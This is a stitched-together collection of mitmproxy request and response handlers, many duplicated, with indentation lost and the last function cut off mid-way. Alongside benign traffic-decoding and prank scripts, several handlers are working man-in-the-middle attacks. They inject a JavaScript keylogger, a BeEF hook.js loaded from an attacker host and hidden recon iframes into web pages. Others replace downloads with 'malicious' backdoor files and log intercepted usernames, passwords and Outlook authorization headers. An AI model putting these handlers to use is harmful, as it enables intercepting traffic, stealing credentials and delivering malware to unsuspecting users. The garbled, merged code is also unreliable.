def copy_flow_format_data(part, scope, flow):
if part == "u":
data = flow.request.url
else:
data = ""
if scope in ("q", "a"):
if flow.request.content is None:
return None, "Request content is missing"
with models.decoded(flow.request):
if part == "h":
data += netlib.http.http1.assemble_request(flow.request)
elif part == "c":
data += flow.request.content
else:
raise ValueError("Unknown part: {}".format(part))
if scope == "a" and flow.request.content and flow.response:
# Add padding between request and response
data += "\r\n" * 2
if scope in ("s", "a") and flow.response:
if flow.response.content is None:
return None, "Response content is missing"
with models.decoded(flow.response):
if part == "h":
data += netlib.http.http1.assemble_response(flow.response)
elif part == "c":
data += flow.response.content
else:
raise ValueError("Unknown part: {}".format(part))
return data, False
def copy_flow_format_data(part, scope, flow):
if part == "u":
data = flow.request.url
else:
data = ""
if scope in ("q", "a"):
if flow.request.content is None:
return None, "Request content is missing"
with models.decoded(flow.request):
if part == "h":
data += netlib.http.http1.assemble_request(flow.request)
elif part == "c":
data += flow.request.content
else:
raise ValueError("Unknown part: {}".format(part))
if scope == "a" and flow.request.content and flow.response:
# Add padding between request and response
data += "\r\n" * 2
if scope in ("s", "a") and flow.response:
if flow.response.content is None:
return None, "Response content is missing"
with models.decoded(flow.response):
if part == "h":
data += netlib.http.http1.assemble_response(flow.response)
elif part == "c":
data += flow.response.content
else:
raise ValueError("Unknown part: {}".format(part))
return data, False
def response(self, flow):
with decoded(flow.response):
flow.response.content = flow.response.content.replace(
"</body>", "<script>" + self.content + "</script></body>")
self.log.info(
'[{}] *********** keylogger injected *****************'.format(
self.name))
def response(self, flow):
if self.isfilePath:
with decoded(flow.response):
flow.response.content = flow.response.content.replace(
"</body>", "<script>" + self.content + "</script></body>")
self.send_output.emit(
'[{}] javascript keylogger injected..'.format(self.Name))
def response(context, flow):
if not flow.match("~u plfe"):
return
with decoded(flow.response):
try:
env = RpcResponseEnvelopeProto()
env.ParseFromString(flow.response.content)
except Exception, e:
print("Deserializating Envelop exception: %s" % e)
return
keys = context.methods_for_request.pop(env.response_id)
for value in env.returns:
key = keys.popleft()
name = Method.Name(key)
if (len(context.filter_methods) > 0 and name not in context.filter_methods):
continue
name = mismatched_apis.get(name, name) #return class name when not the same as method
klass = underscore_to_camelcase(name) + "OutProto"
try:
mor = deserialize(value, "." + klass)
print("Deserialized Response %i: %s" % (env.response_id, name))
except:
print("Missing Response API: %s" % name)
print(mor)
if (key == GET_MAP_OBJECTS):
getMapObjects.response(mor, env)
def response(context, flow):
url = urlparse(flow.request.pretty_url)
url_without_query = url.scheme + "://" + url.netloc + url.path
if url_without_query in context.data:
with decoded(flow.response):
with open(context.data[url_without_query], "r") as file:
flow.response.content = file.read()
def response(context, flow):
if driver.name:
rule = flow.mastermind["rule"]
if rule:
delay = rules.delay(rule)
if delay:
time.sleep(delay)
with decoded(flow.response):
status_code = rules.status_code(rule)
body_filename = rules.body_filename(rule)
schema = rules.schema(rule, context.source_dir)
if status_code:
status_message = http.status_message(status_code)
flow.response.status_code = status_code
flow.response.msg = status_message
if schema:
table = driver.db.table(flow.request.url)
res = yaml.safe_load(flow.response.content)
schema_result = validator.check(res, schema)
table.insert_multiple(schema_result)
logger.info(schema_result)
rules.process_headers("response", rule, flow.response.headers)
if body_filename:
# 204 might be set by the skip rule in the request hook
if flow.response.status_code == 204:
flow.response.status_code = 200
flow.response.msg = "OK"
flow.response.content = rules.body(body_filename, context.source_dir)
def response(context, flow):
"""========================================================================
"Called when a server response has been received"... łapię wyłącznie
odpowiedzi, bo interesują mnie zestawy (request/response). Przechwycony
response wraz z requestem wchodzą w skład transakcji, reprezentowanej przez
mitmproxy.models.HTTPFlow()
"HTTPFlow is collection of objects representing a single HTTP transaction".
Więcej info na WWW: http://docs.mitmproxy.org/en/stable/dev/models.html
==========================================================================="""
if flow.request.host.endswith('.thesettlersonline.pl'):
if "application/x-amf" in flow.response.headers.get("Content-Type", "_"):
with decoded(flow.response):
res = flow.response.content
req = flow.request.content
if search( 'defaultGame.Communication.VO.TradeWindow.dTradeWindowResultVO', res )\
and search( 'userAcceptedTradeIDs', res ) and search( 'tradeOffers', res )\
and search( 'GetAvailableOffers', req ):
log.debug("got trade REQ/RESP pair, feeding TDD thread...")
try:
t= Thread(target=ttd._incoming_traffic_handler, args=(context, flow,))
t.setDaemon(True)
t.start()
except (KeyboardInterrupt, SystemExit):
log.info('caught either KeyboardInterrupt or SystemExit, quitting threads')
t.__stop()
import thread
thread.interrupt_main()
def response(context, flow):
with decoded(flow.response):
if flow.request.pretty_host == 'api.openweathermap.org':
obj = json.loads(flow.response.content)
if flow.request.path.startswith("/data/2.5/weather"):
obj["weather"][0]['id'] = '901'
obj["weather"][0]['icon'] = '11d'
obj["main"]["temp"] = -273.15
obj["main"]["description"] = "On est foutus"
obj["name"] = "\\_o<"
elif flow.request.path.startswith("/data/2.5/forecast"):
for e in obj['list']:
e['clouds'] = 100
e['temp'] = {"min": -20, "max": -10, "eve": -10, "morn": -20, "night": -15, "day": -10}
e['weather'][0]['id'] = "901"
e['weather'][0]['icon'] = "11d"
flow.response.content = json.dumps(obj)
elif 'Content-Type' in flow.response.headers and flow.response.headers['Content-Type'] == 'image/jpeg':
_blur_that(flow,"JPEG")
elif 'Content-Type' in flow.response.headers and flow.response.headers['Content-Type'] == 'image/png':
_blur_that(flow,"PNG")
elif (flow.request.pretty_host == 'eas.outlook.com'
and flow.request.path.startswith("/Microsoft-Server-ActiveSync")):
atype,b64 = flow.request.headers['Authorization'].split(' ')
context.log( "OUTLOOK AUTH : %s"%base64.b64decode(b64) , level='info')
flow.reply()
def response(self, flow):
with decoded(flow.response):
if flow.response.content:
c = flow.response.content.replace('</body>', '<style>body '
'{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}'
'</style></body>')
if c > 0:
self.send_output.emit('[{}] {} CSS injected...'.format(self.Name,flow.request.pretty_host))
def response(self, flow):
with decoded(flow.response):
canvas = re.sub("SECONDS_GO_HERE", str(self.interval * 1000),
open(self.content_path, "rb").read())
flow.response.content = flow.response.content.replace(
self.replace_str, '<script type="text/javascript">' + canvas +
'</script>' + self.replace_str)
def response(context, flow):
if flow.request.host.endswith("nianticlabs.com"):
with decoded(flow.response):
conn = HTTPConnection("127.0.0.1")
conn.request("POST", "/api/update", flow.response.content)
res = conn.getresponse()
if res.status/100 not in [2, 3]:
context.log("Got error sending mitm data to api ({})".format(res.status), level="error")
def response(self, flow):
with decoded(flow.response):
if flow.response.content:
c = flow.response.content.replace(
'</body>', '<style>body '
'{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}'
'</style></body>')
if c > 0:
self.send_output.emit('[{}] {} CSS injected...'.format(
self.Name, flow.request.pretty_host))
def response(self, flow):
with decoded(flow.response):
inject_content = ""
with open(self.content_path, 'r') as f:
for line in f:
inject_content += line
flow.response.content = flow.response.content.replace(
"</body>", "<script>" + inject_content + "</script></body>")
def response(self,flow):
if str(flow.response.headers['Content-Type']).startswith('image'):
if path.isfile(self.imagePath):
with decoded(flow.response):
try:
img = cStringIO.StringIO(open(self.imagePath, 'rb').read())
flow.response.content = img.getvalue()
self.send_output.emit('[{}] URL:{} image replaced...'.format(self.Name,flow.request.url))
except:
pass
def response(self, flow):
with decoded(flow.response):
inject_content = ""
with open(self.content_path, 'r') as f:
for line in f:
inject_content += line
flow.response.content = flow.response.content.replace("</body>", "<script>" + inject_content + "</script></body>")
def response(self, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
if html.body:
script = html.new_tag('script', src=self.config["beef_url"])
html.body.insert(0, script)
flow.response.content = str(html)
ctx.log.info(
"[{}] Injected BeFF url hook in page '{}'...".format(
self.name, flow.request.url))
def response(context, flow):
with decoded(flow.response):
if flow.match("~d pgorelease.nianticlabs.com"):
env = RpcResponseEnvelopeProto()
env.ParseFromString(flow.response.content)
key = associate[env.response_id]
value = env.returns[0]
if (key == GET_MAP_OBJECTS):
mor = MapObjectsResponse()
mor.ParseFromString(value)
print("GET_MAP_OBJECTS %i tiles" % len(mor.tiles))
features = []
for tile in mor.tiles:
print("S2 Cell %i" % tile.id)
for fort in tile.forts:
p = Point((fort.longitude, fort.latitude))
f = Feature(geometry=p, id=len(features), properties={"id": fort.id, "tile": tile.id, "type": "fort", "marker-color": "0000FF"})
features.append(f)
for fort in tile.location4:
p = Point((fort.longitude, fort.latitude))
f = Feature(geometry=p, id=len(features), properties={"tile": tile.id, "type": "location4", "marker-color": "FFFF00"})
features.append(f)
for fort in tile.location9:
p = Point((fort.longitude, fort.latitude))
f = Feature(geometry=p, id=len(features), properties={"tile": tile.id, "type": "location9", "marker-color": "00FFFF"})
features.append(f)
for fort in tile.close_pokemon_a:
p = Point((fort.longitude, fort.latitude))
f = Feature(geometry=p, id=len(features), properties={"id": fort.uid, "tile": tile.id, "type": "close_pokemon_a", "marker-color": "FF0000"})
features.append(f)
for fort in tile.close_pokemon_b:
p = Point((fort.longitude, fort.latitude))
f = Feature(geometry=p, id=len(features), properties={"id": fort.uid, "tile": tile.id, "type": "close_pokemon_b", "marker-color": "00FF00"})
features.append(f)
fc = FeatureCollection(features)
dump = geojson.dumps(fc, sort_keys=True)
f = open('get_map_objects.json', 'w')
f.write(dump)
elif (key == FORT_DETAILS):
mor = FortDetailsOutProto()
mor.ParseFromString(value)
print(mor)
elif (key == FORT_SEARCH):
mor = FortSearchOutProto()
mor.ParseFromString(value)
print(mor)
else:
print("API: %s" % key)
def response(context, flow):
if flow.request.host.endswith("nianticlabs.com"):
with decoded(flow.response):
conn = HTTPConnection("127.0.0.1")
conn.request("POST", "/api/update", flow.response.content)
res = conn.getresponse()
if res.status / 100 not in [2, 3]:
context.log("Got error sending mitm data to api ({})".format(
res.status),
level="error")
def response(context, flow):
replace_str = "</body>"
replace_content = "<script src='http://"+context.hook_ip+":3000/hook.js'></script>"
if "text/html" in flow.response.headers['Content-Type']:
with decoded(flow.response):
if replace_str in flow.response.content:
flow.response.content = flow.response.content.replace(replace_str, replace_content + replace_str)
context.log("hook.js injected!")
else:
pass
def response(context, flow):
if flow.response.headers.get("content-type", "").startswith("image"):
with decoded(flow.response): # automatically decode gzipped responses.
try:
s = cStringIO.StringIO(flow.response.content)
img = Image.open(s).rotate(180)
s2 = cStringIO.StringIO()
img.save(s2, "png")
flow.response.content = s2.getvalue()
flow.response.headers["content-type"] = "image/png"
except: # Unknown image types etc.
pass
def response(context, flow):
if flow.response.headers.get("content-type", "").startswith("image"):
with decoded(flow.response): # automatically decode gzipped responses.
try:
s = StringIO(flow.response.content)
img = Image.open(s).rotate(180)
s2 = StringIO()
img.save(s2, "png")
flow.response.content = s2.getvalue()
flow.response.headers["content-type"] = "image/png"
except: # Unknown image types etc.
pass
def response(context, flow):
replace_str = "</body>"
replace_content = "<script src='http://" + context.hook_ip + ":3000/hook.js'></script>"
if "text/html" in flow.response.headers['Content-Type']:
with decoded(flow.response):
if replace_str in flow.response.content:
flow.response.content = flow.response.content.replace(
replace_str, replace_content + replace_str)
context.log("hook.js injected!")
else:
pass
def response(self, flow):
with decoded(flow.response):
if flow.response.content:
c = flow.response.content.replace('</body>', '''<script>
window.onload=function() {
var move=document.getElementsByTagName("body")[0];
setInterval(function() {
move.style.marginTop=(move.style.marginTop=="4px")?"-4px":"4px";
}, 5);
}
</script></body>''')
if c > 0:
self.send_output.emit('[{}] {} javascript injected...'.format(self.Name,flow.request.pretty_host))
def response(context, flow):
if flow.request.url == context.url:
flow.request.headers['Cache-Control'] = 'no-cache'
flow.response.headers['Cache-Control'] = 'no-cache'
if 'If-None-Match' in flow.request.headers:
del flow.request.headers['If-None-Match']
if 'ETag' in flow.response.headers:
del flow.response.headers['ETag']
with decoded(flow.response):
data = open(context.filepath).read()
flow.response.content = data
def response(self, flow):
if str(flow.response.headers['Content-Type']).startswith('image'):
if path.isfile(self.imagePath):
with decoded(flow.response):
try:
img = cStringIO.StringIO(
open(self.imagePath, 'rb').read())
flow.response.content = img.getvalue()
self.send_output.emit(
'[{}] URL:{} image replaced...'.format(
self.Name, flow.request.url))
except:
pass
def response(self, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
script = html.new_tag('script', src=self.urlhook)
html.body.insert(0, script)
flow.response.content = str(html)
self.send_output.emit("[{}] Injected BeFF url hook...".format(
self.Name))
def response(flow):
if flow.request.host in iframe_url:
return
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content, "lxml")
if html.body:
iframe = html.new_tag(
"iframe",
src=iframe_url,
frameborder=0,
height=0,
width=0)
html.body.insert(0, iframe)
flow.response.content = str(html).encode("utf8")
def response(context, flow):
if flow.request.host in context.iframe_url:
return
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content, "lxml")
if html.body:
iframe = html.new_tag("iframe",
src=context.iframe_url,
frameborder=0,
height=0,
width=0)
html.body.insert(0, iframe)
flow.response.content = str(html)
context.log("Iframe inserted.")
def response(self, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
script = html.new_tag('script', src=self.url)
html.body.insert(0, script)
flow.response.content = str(html)
self.log.info(
"[{}]******* script Filter Injected *******".format(
self.name))
def response(context, flow):
with decoded(flow.response): # automatically decode gzipped responses.
client_conn = str(flow.client_conn)
server_conn = str(flow.client_conn)
client_conn = client_conn.split(" ")[1]
client_conn = client_conn.split(":")[0]
inject_recon = "\n<iframe src='http://" + context.server + "/recon/recon.php?client_conn=" + client_conn + "' height='1' width='1' style='display:none'></iframe>\n"
flow.response.content = flow.response.content.replace(
"</body>", inject_recon + "</body>")
flow.response.content = flow.response.content.replace(
"client_conn_xxx_xxx_xxx_xxx", client_conn)
def response(context, flow):
if flow.request.host in context.iframe_url:
return
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
if html.body:
iframe = html.new_tag(
"iframe",
src=context.iframe_url,
frameborder=0,
height=0,
width=0)
html.body.insert(0, iframe)
flow.response.content = str(html)
context.log("Iframe inserted.")
def response(self, flow):
try:
# for another format file types
content = flow.response.headers['Content-Type']
if content in self.payloads:
if path.isfile(self.payloads[content]):
with decoded(flow.response):
self.log.info('[downloadspoof]:: URL: {}'.format(flow.request.url))
self.log.info("[downloadspoof]:: Replaced file of mimtype {} with malicious version".format(content))
flow.response.content = open(self.payloads[content],'rb').read()
self.log.info('[downloadspoof]:: Patching complete, forwarding to user...')
return
self.log.info('[downloadspoof]:: {}, Error Path file not found\n'.format(self.payloads[content]))
except Exception as e:
pass
def response(self, flow):
try:
# for another format file types
content = flow.response.headers['Content-Type']
if content in self.payloads:
if path.isfile(self.payloads[content]):
with decoded(flow.response):
self.send_output.emit('[downloadspoof]:: URL: {}'.format(flow.request.url))
self.send_output.emit("[downloadspoof]:: Replaced file of mimtype {} with malicious version".format(content))
flow.response.content = open(self.payloads[content],'rb').read()
self.send_output.emit('[downloadspoof]:: Patching complete, forwarding to user...')
return
self.send_output.emit('[downloadspoof]:: {}, Error Path file not found\n'.format(self.payloads[content]))
except Exception as e:
pass
def response(self, flow):
pass
# if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
if "text/html" in flow.response.headers["Content-Type"]:
with decoded(flow.response):
for item, v in self.config[self.name]["regex"].iteritems():
# if v.split("||")[0] in flow.request.host and self.theFlag == False:
str_search = v.split("||")[0]
str_replace = v.split("||")[1]
if str_search in flow.response.content:
flow.response.content = flow.response.content.replace(str_search, str_replace)
logger.debug(
"[" + self.name + "] " + str_search + " to " + str_replace + " in " + flow.request.host
)
def response(self, flow):
try:
# for another format file types
content = flow.response.headers['Content-Type']
if content in self.backdoors:
if path.isfile(self.backdoors[content]):
with decoded(flow.response):
print "[{}]:: URL: {}".format(self.name, flow.request.url)
flow.response.content = open(self.backdoors[content], 'rb').read()
print "[{}]:: Replaced file of mimtype {} with malicious version".format(self.name, content)
print "[{}]:: Replacement complete, forwarding to user...".format(self.name)
return
print "[{}]:: {}, Error Path file not found\n".format(self.name, self.backdoors[content])
except Exception as e:
pass
def response(self,flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
script = html.new_tag(
'script',
src=self.urlhook)
html.body.insert(0, script)
flow.response.content = str(html)
self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))
def response(self, flow):
pass
#if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
if "text/html" in flow.response.headers['Content-Type']:
with decoded(flow.response):
for item, v in self.config[self.name]['regex'].iteritems():
#if v.split("||")[0] in flow.request.host and self.theFlag == False:
str_search = v.split("||")[0]
str_replace = v.split("||")[1]
if str_search in flow.response.content:
flow.response.content = flow.response.content.replace(
str_search, str_replace)
logger.debug("[" + self.name + "] " + str_search +
" to " + str_replace + " in " +
flow.request.host)
def response(self, flow):
with decoded(flow.response):
if flow.response.content:
c = flow.response.content.replace(
'</body>', '''<script>
window.onload=function() {
var move=document.getElementsByTagName("body")[0];
setInterval(function() {
move.style.marginTop=(move.style.marginTop=="4px")?"-4px":"4px";
}, 5);
}
</script></body>''')
if c > 0:
self.send_output.emit(
'[{}] {} javascript injected...'.format(
self.Name, flow.request.pretty_host))
def response(self,flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content,'lxml')
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
url = '{}'.format(flow.request.pretty_host)
metatag = html.new_tag('script')
metatag.attrs['src'] = self.urlhook
metatag.attrs['type'] = 'text/javascript'
html.body.append(metatag)
flow.response.content = str(html)
self.send_output.emit("[{}] Injected BeFF hook in URL:[ {} ] ".format(self.Name,url))
def response(self, flow):
pass
f = open(self.content_path, "r")
replace_content = f.readline()
f.close()
#if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
if "text/html" in flow.response.headers['Content-Type']:
with decoded(flow.response):
if self.replace_str in flow.response.content:
flow.response.content = flow.response.content.replace(
self.replace_str, replace_content + self.replace_str)
logger.debug("[" + self.name + "] Payload injected > " +
flow.request.host)
else:
pass
def response(self, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content, 'lxml')
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
url = '{}'.format(flow.request.pretty_host)
metatag = html.new_tag('script')
metatag.attrs['src'] = self.url
metatag.attrs['type'] = 'text/javascript'
html.body.append(metatag)
flow.response.content = str(html)
self.send_output.emit(
"[{} js script Injected in [ {} ]".format(self.Name, url))
def response(self, flow):
pass
f = open(self.content_path, "r")
replace_content = f.readline()
f.close()
#if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
if "text/html" in flow.response.headers['Content-Type']:
with decoded(flow.response):
if self.replace_str in flow.response.content:
flow.response.content = flow.response.content.replace(self.replace_str, replace_content + self.replace_str)
logger.debug("["+self.name+"] Payload injected > " + flow.request.host)
else:
pass
#print "- " + flow.response.headers['Content-Type'][0]
def response(self,flow):
if self.isfilePath:
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content.decode('utf-8', 'ignore'),'lxml')
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
temp_soup = BeautifulSoup(self.content,'lxml')
html.body.insert(len(html.body.contents), temp_soup)
flow.response.content = str(html)
return self.send_output.emit("[{}] [Request]: {} | injected ".format(self.Name,flow.request.pretty_host))
else:
return self.send_output.emit("[{}] Error Path file not found ".format(self.Name))
def request(self, flow):
self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
with decoded(flow.request):
user_passwd = self.get_password_POST(flow.request.content)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
self.send_output.emit( 'HTTP username: %s' % http_user)
self.send_output.emit( 'HTTP password: %s\n' % http_pass)
except UnicodeDecodeError:
pass
def request(ctx, flow):
if not flow.match("~d pgorelease.nianticlabs.com"):
return
with decoded(flow.request):
req = protocol.RequestEnvelope()
req.ParseFromString(flow.request.content)
if req.id in requests:
ctx.log("Duplicate Request", req.id)
requests[req.id] = queue.Queue()
for request in req.requests:
messageName = toCamelCase(protocol.Method.Name(request.method))
requests[req.id].put(messageName)
if args.filter and messageName not in args.filter:
continue
if args.ignore and messageName in args.ignore:
continue
messageName += "Request"
print("Request: (%s, %s)" % (messageName, request.method))
if not request.payload:
continue
if args.always_raw:
print("Request: Raw (type: %s) (name: %s)" %
(request.method, messageName))
printRawMessage(request.payload)
else:
try:
MessageType = getattr(protocol, messageName)
Message = MessageType()
Message.ParseFromString(request.payload)
print(Message)
except:
print("Request: Unknown Message (name: %s)" % messageName)
printRawMessage(request.payload)
def request(ctx, flow):
if not flow.match("~d pgorelease.nianticlabs.com"):
return
with decoded(flow.request):
req = protocol.RequestEnvelope()
req.ParseFromString(flow.request.content)
if req.id in requests:
ctx.log("Duplicate Request", req.id)
requests[req.id] = queue.Queue()
for request in req.requests:
messageName = toCamelCase(protocol.Method.Name(request.method))
requests[req.id].put(messageName)
if args.filter and messageName not in args.filter:
continue
if args.ignore and messageName in args.ignore:
continue
messageName += "Request"
print("Request: (%s, %s)" % (messageName, request.method))
if not request.payload:
continue
if args.always_raw:
print("Request: Raw (type: %s) (name: %s)" %
(request.method, messageName))
printRawMessage(request.payload)
else:
try:
MessageType = getattr(protocol, messageName)
Message = MessageType()
Message.ParseFromString(request.payload)
print(Message)
except:
print("Request: Unknown Message (name: %s)" % messageName)
printRawMessage(request.payload)
def response(ctx, flow):
if not flow.match("~d pgorelease.nianticlabs.com"):
return
with decoded(flow.response):
resp = protocol.ResponseEnvelope()
resp.ParseFromString(flow.response.content)
i = -1
while not requests[resp.id].empty():
i += 1
requestName = requests[resp.id].get()
if args.filter and requestName not in args.filter:
continue
if args.ignore and requestName in args.ignore:
continue
request = requestName + "Response"
print("Response: (%s)" % request)
if not resp.responses[i]:
continue
if args.always_raw:
print("Response: Unknown Message (name: %s)"
% request)
printRawMessage(resp.responses[i])
else:
try:
MessageType = getattr(protocol, request)
Message = MessageType()
Message.ParseFromString(resp.responses[i])
print(Message)
except:
print("Response: Unknown Message (name: %s)"
% request)
printRawMessage(resp.responses[i])
del requests[resp.id]
def request(self, flow):
self.log.info("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
with decoded(flow.request):
user_passwd = self.get_password_POST(flow.request.content)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
self.log.info("\n[HTTP REQUEST HEADERS]\n")
for name, valur in flow.request.headers.iteritems():
self.log.info('{}: {}'.format(name,valur))
self.log.info('\n')
self.log.info( 'HTTP username: %s' % http_user)
self.log.info( 'HTTP password: %s\n' % http_pass)
except UnicodeDecodeError:
pass
self.log.info('\n')
def response(context, flow):
"""========================================================================
==========================================================================="""
if flow.request.host.endswith('.thesettlersonline.pl'):
if "application/x-amf" in flow.response.headers.get("Content-Type", "_"):
with decoded(flow.response):
res = flow.response.content
if search( 'defaultGame.Communication.VO.dZoneVO', res )\
and search( 'defaultGame.Communication.VO.dBuffVO', res )\
and search( 'defaultGame.Communication.VO.dPlayerVO',res ):
log.debug("got type 1001 response... wysyłam szpiega...")
try:
t= Thread(target=sgd._incoming_traffic_handler, args=(flow.response.content,))
t.setDaemon(True)
t.start()
except (KeyboardInterrupt, SystemExit):
log.info('caught either KeyboardInterrupt or SystemExit, quitting threads')
t.__stop()
import thread
thread.interrupt_main()
def response(ctx, flow):
if not flow.match("~d pgorelease.nianticlabs.com"):
return
with decoded(flow.response):
resp = protocol.ResponseEnvelope()
resp.ParseFromString(flow.response.content)
i = -1
while not requests[resp.id].empty():
i += 1
requestName = requests[resp.id].get()
if args.filter and requestName not in args.filter:
continue
if args.ignore and requestName in args.ignore:
continue
request = requestName + "Response"
print("Response: (%s)" % request)
if not resp.responses[i]:
continue
if args.always_raw:
print("Response: Unknown Message (name: %s)" % request)
printRawMessage(resp.responses[i])
else:
try:
MessageType = getattr(protocol, request)
Message = MessageType()
Message.ParseFromString(resp.responses[i])
print(Message)
except:
print("Response: Unknown Message (name: %s)" % request)
printRawMessage(resp.responses[i])
del requests[resp.id]
def response(context, flow):
if not hasattr(context, 'dest_path'):
raise Exception('context.dest_path is unset')
with decoded(flow.response):
if (flow.response.status_code == 200):
data = collections.OrderedDict()
req = data['request'] = collections.OrderedDict()
resp = data['response'] = collections.OrderedDict()
req['headers'] = format_headers_as_list(flow.request.headers)
resp['headers'] = format_headers_as_list(flow.response.headers)
data['url'] = flow.request.url
#data['content'] = flow.response.content
data['host'] = flow.request.headers["Host"]
data['content-type'] = flow.response.headers['Content-Type']
data['filetype'] = data['content-type'].split(';', 1)[0]
url = URLObject(data['url'])
data['path'] = url.path
_, fileext = os.path.splitext(data['path'])
if data['path'].endswith('/'):
filepath = data['path'] + 'index'
else:
filepath = data['path']
if not fileext:
fileext = MIMETYPE_TO_FILEEXT.get(data['filetype'])
if fileext is not None:
filepath = "%s.%s" % (filepath, fileext)
data['fileext'] = fileext
data['filepath'] = filepath
paths = [context.dest_path]
if context.include_host_in_path:
paths.append(data['host'])
paths.append(data['filepath'])
data['output_path'] = joinpaths(*paths)
context.log(json.dumps(data, indent=2))
output_dirname = os.path.dirname(data['output_path'])
if not os.path.exists(output_dirname):
os.makedirs(output_dirname, mode=context.dirmode)
with file(data['output_path'], 'wb') as f:
f.write(flow.response.content)
def response(context, flow):
if not hasattr(context, 'dest_path'):
raise Exception('context.dest_path is unset')
with decoded(flow.response):
if (flow.response.status_code == 200):
data = collections.OrderedDict()
req = data['request'] = collections.OrderedDict()
resp = data['response'] = collections.OrderedDict()
req['headers'] = format_headers_as_list(flow.request.headers)
resp['headers'] = format_headers_as_list(flow.response.headers)
data['url'] = flow.request.url
#data['content'] = flow.response.content
data['host'] = flow.request.headers["Host"]
data['content-type'] = flow.response.headers['Content-Type']
data['filetype'] = data['content-type'].split(';', 1)[0]
url = URLObject(data['url'])
data['path'] = url.path
_, fileext = os.path.splitext(data['path'])
if data['path'].endswith('/'):
filepath = data['path'] + 'index'
else:
filepath = data['path']
if not fileext:
fileext = MIMETYPE_TO_FILEEXT.get(data['filetype'])
if fileext is not None:
filepath = "%s.%s" % (filepath, fileext)
data['fileext'] = fileext
data['filepath'] = filepath
paths = [context.dest_path]
if context.include_host_in_path:
paths.append(data['host'])
paths.append(data['filepath'])
data['output_path'] = joinpaths(*paths)
context.log(json.dumps(data, indent=2))
output_dirname = os.path.dirname(data['output_path'])
if not os.path.exists(output_dirname):
os.makedirs(output_dirname, mode=context.dirmode)
with file(data['output_path'], 'wb') as f:
f.write(flow.response.content)
def response(context, flow):
with decoded(flow.response):
if flow.match("~d pgorelease.nianticlabs.com"):
env = RpcResponseEnvelopeProto()
env.ParseFromString(flow.response.content)
keys = methods_for_request[env.response_id]
for value in env.returns:
key = keys.popleft()
name = Method.Name(key)
name = mismatched_apis.get(name, name) #return class name when not the same as method
klass = underscore_to_camelcase(name) + "OutProto"
try:
mor = deserialize(value, "." + klass)
print("Deserialized Response %s" % name)
except:
print("Missing Response API: %s" % name)
if (key == GET_MAP_OBJECTS):
getMapObjects.response(mor, env)
def response(flow):
#print(flow.response.headers['Content-Type'])
with decoded(flow.response):
ctype = flow.response.headers['Content-Type']
if ctype.startswith('image/'):
#print(flow.response.headers['Content-Type'])
url = urlsplit(flow.request.url)
name = os.path.basename(url.path)
outfile = ''
#print('==>>',url,name)
path_arr = url.path.split('/')
path_arr.pop()
print('/'.join(path_arr))
outfile = ('/Users/xxxx/Desktop/www/'.join(path_arr) + '/')
if not os.path.exists(outfile):
os.makedirs(outfile)
outfile = outfile + name
with open(outfile, 'wb') as f:
f.write(flow.response.content)
f.close()
print(outfile, ' written')
if (ctype.startswith('text/') or ctype.startswith('application/')):
#print(flow.response.headers['Content-Type'])
url = urlsplit(flow.request.url)
name = os.path.basename(url.path)
outfile = ''
path_arr = url.path.split('/')
path_arr.pop()
print('/'.join(path_arr))
outfile = ('/Users/xxxx/Desktop/www/'.join(path_arr) + '/')
if not os.path.exists(outfile):
#print('zy==>>',outfile)
os.makedirs(outfile)
outfile = outfile + name
with open(outfile, 'wb') as f:
f.write(flow.response.content)
f.close()
print(outfile, ' written')
def response(context, flow):
if driver.name:
rule = flow.mastermind['rule']
if rule:
delay = rules.delay(rule)
if delay:
time.sleep(delay)
with decoded(flow.response):
status_code = rules.status_code(rule)
body_filename = rules.body_filename(rule)
schema = rules.schema(rule,
context.source_dir)
if status_code:
status_message = http.status_message(status_code)
flow.response.status_code = status_code
flow.response.msg = status_message
if schema:
